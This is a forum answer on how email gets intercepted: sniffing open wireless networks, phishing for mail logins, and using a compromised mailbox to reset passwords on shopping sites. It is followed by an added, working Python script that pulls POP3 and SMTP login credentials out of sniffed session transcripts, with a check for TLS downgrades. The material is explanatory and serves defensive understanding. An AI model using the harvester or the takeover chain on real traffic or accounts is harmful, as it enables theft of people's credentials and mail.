Does anyone have real-life examples of e-mail being intercepted?

I personally have witnessed live, in-transit email interception. It was at a technical conference and the session was all about sniffing networks. The instructor just fired her sniffer up on the conference wireless network and within 15 minutes had several POP3/SMTP authentication pairs, complete with the retrieved and sent messages. These were laptops out in the conference halls polling their email over unencrypted protocols. Then, in the 15-30 minutes after the session, the attendees were doing the same thing once they had downloaded the right tools.

I would be very, very surprised if the same kinds of things are never done on our campus WLAN.

As a side note, the instructor also admitted to sniffing her cable-neighbor's traffic. For educational purposes only.

In terms of SMTP processing, email is vastly more likely to be intercepted close to the endpoints. The interested parties are on either end of that conversation. In the middle, where the SMTP traffic is flowing over the greater Internet, the interested party is much more likely to be a government than evil hackers.

That said, the biggest interception cases are not grabbing the SMTP transaction in flight; they're grabbing the POP3/IMAP/SMTP/webmail login, which ensures complete interception ability in perpetuity (or at least until the password is changed). This is attempted daily on my network via phishing. Once credentials are leaked, email can be read willy-nilly or, more commonly, the credentials are used to send spam by way of our trusted email servers.


To answer your questions, though,

1: Yes, this is a real problem. The biggest exposure is over untrusted (or trusted but unencrypted) wireless networks. And governments.

2: They're out there, but I'd have to google and I'm lazy this Saturday morning. Intercepting actual SMTP transactions not at the endpoint is generally the purview of governments and corporate security. Hackers generally target mailboxes, not the transactions, as they're a much richer target.

3: Sniffing wireless networks for unencrypted email transactions is by FAR the easiest method. Think coffee-shop type setups. Lesser methods like suborning mail servers to grab messages are more theoretical than actual, though much more harmful when they do occur.


Stepping back one step to the topic of password reset emails, hackers who have compromised a mailbox can leverage such emails to compromise other sites. They compromise a gmail account and by looking at messages realize that this person does a lot of business with a certain ecommerce site known to store credit-card information. They go to that site and go through the forgotten-password process (since a LOT of sites now use the email address as the account-name these days) and get the password reset email. They reset the password, which starts the timer on when the account-owner will notice. Evil commences, especially if the ecommerce site is one that displays whole credit-card numbers in the profile.

The sad thing here is that it is entirely possible that the account-owner won't even see the inability to log in as a certain sign that evil has occurred. If they're not using a password-remembering program they could just chalk it up to creeping old age and just reset the password to one they know.
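As an added example (not part of the original answer or question), here is a Python parser that does what the instructor's sniffer did once the TCP streams were reassembled: it pulls POP3 USER/PASS and SMTP AUTH PLAIN/LOGIN credentials out of session transcripts. The transcripts, accounts, passwords and hostnames are constructed for illustration, and the `C:`/`S:` line prefixes are my own convention for a reassembled client/server stream, not any tool's format. It also handles the caveat the answer leaves implicit: once STARTTLS/STLS is accepted the sniffer sees only ciphertext and there is nothing to harvest, whereas a rejected upgrade followed by a plaintext login is still fully exposed.

```python
"""Added example: harvest cleartext mail logins from captured POP3/SMTP
sessions, as a sniffer on an open WLAN would.  All transcripts, accounts,
passwords and hostnames below are constructed (hypothetical)."""
import base64
from typing import List, Optional, Tuple

Cred = Tuple[str, str, str]   # (mechanism, username, password)


def _b64(token: str) -> str:
    """Decode one base64 token; return '' on junk so a bad line cannot abort the parse."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:        # binascii.Error is a ValueError subclass
        return ""


def extract_credentials(capture: str) -> List[Cred]:
    """Walk a reassembled stream ('C: ' = client line, 'S: ' = server line) and
    return every credential that crossed the wire in the clear.

    Parsing stops once the server ACCEPTS STARTTLS/STLS (220 / +OK): from there
    on the sniffer only sees ciphertext.  If the server REJECTS the upgrade and
    the client logs in anyway (a downgrade), the login is still captured."""
    creds: List[Cred] = []
    pop_user: Optional[str] = None   # POP3 USER seen, waiting for PASS
    pending: Optional[str] = None    # "PLAIN" or "LOGIN": SASL exchange in progress
    login_parts: List[str] = []      # client replies collected during AUTH LOGIN
    awaiting_tls = False             # client asked for STARTTLS/STLS; need the verdict

    def sasl_reply(token: str) -> None:
        """Consume one client SASL response for the mechanism in `pending`."""
        nonlocal pending
        if pending == "PLAIN":                        # \0authcid\0password
            parts = _b64(token).split("\0")
            if len(parts) == 3:
                creds.append(("SMTP AUTH PLAIN", parts[1], parts[2]))
            pending = None
        elif pending == "LOGIN":                      # username, then password
            login_parts.append(_b64(token))
            if len(login_parts) == 2:
                creds.append(("SMTP AUTH LOGIN", login_parts[0], login_parts[1]))
                pending = None

    for raw in capture.splitlines():
        who, _, line = raw.partition(" ")
        line = line.strip()
        if who == "S:":
            if awaiting_tls:
                awaiting_tls = False
                if line.startswith(("220", "+OK")):   # upgrade accepted: stream goes dark
                    break
            continue                                  # other server lines carry no secrets
        if who != "C:" or not line:
            continue
        if pending:                                   # mid-SASL: this line is a response
            sasl_reply(line)
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd in ("STARTTLS", "STLS"):
            awaiting_tls = True
        elif cmd == "USER":
            pop_user = arg
        elif cmd == "PASS" and pop_user is not None:
            creds.append(("POP3 USER/PASS", pop_user, arg))
            pop_user = None
        elif cmd == "AUTH":
            mech, _, initial = arg.partition(" ")
            pending = mech.upper() if mech.upper() in ("PLAIN", "LOGIN") else None
            login_parts.clear()
            if pending and initial:                   # SASL initial-response on the AUTH line
                sasl_reply(initial)
    return creds


# Constructed transcripts (hypothetical accounts); built in code so the base64 is right.
_PLAIN_BLOB = base64.b64encode(b"\0bob@example.org\0s3cr3t").decode()

POP3_CAPTURE = """S: +OK POP3 server ready
C: USER alice@example.org
S: +OK
C: PASS hunter2
S: +OK Logged in.
C: RETR 1
"""
SMTP_PLAIN_CAPTURE = f"""S: 220 mail.example.org ESMTP
C: EHLO laptop
S: 250 AUTH PLAIN LOGIN
C: AUTH PLAIN {_PLAIN_BLOB}
S: 235 2.7.0 Authentication successful
"""
SMTP_LOGIN_CAPTURE = """C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: Y2Fyb2w=
S: 334 UGFzc3dvcmQ6
C: bGV0bWVpbg==
S: 235 2.7.0 Authentication successful
"""
# Upgrade accepted: in reality everything after the 220 is ciphertext; the readable
# AUTH line is kept only to show that the parser ignores it.
STARTTLS_OK_CAPTURE = f"""C: STARTTLS
S: 220 2.0.0 Ready to start TLS
C: AUTH PLAIN {_PLAIN_BLOB}
"""
# Upgrade rejected, client logs in anyway (initial-response AUTH LOGIN form).
STARTTLS_DOWNGRADE_CAPTURE = """C: STARTTLS
S: 454 4.7.0 TLS not available due to temporary reason
C: AUTH LOGIN Y2Fyb2w=
S: 334 UGFzc3dvcmQ6
C: bGV0bWVpbg==
"""

if __name__ == "__main__":
    for name, cap in [("POP3", POP3_CAPTURE), ("SMTP PLAIN", SMTP_PLAIN_CAPTURE),
                      ("SMTP LOGIN", SMTP_LOGIN_CAPTURE), ("STARTTLS ok", STARTTLS_OK_CAPTURE),
                      ("STARTTLS downgrade", STARTTLS_DOWNGRADE_CAPTURE)]:
        print(name, "->", extract_credentials(cap))
```

The parser is deliberately client-driven: SMTP AUTH LOGIN is tracked by counting client replies rather than decoding the server's `334` challenges, because a client that has already decided to authenticate answers username then password regardless of how the server phrases the prompt. The two STARTTLS transcripts are the check a practitioner should run against any "we use TLS" claim: only the accepted upgrade protects the login, and a client configured to tolerate a rejected upgrade leaks exactly what the answer describes.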

Tags: Email, Security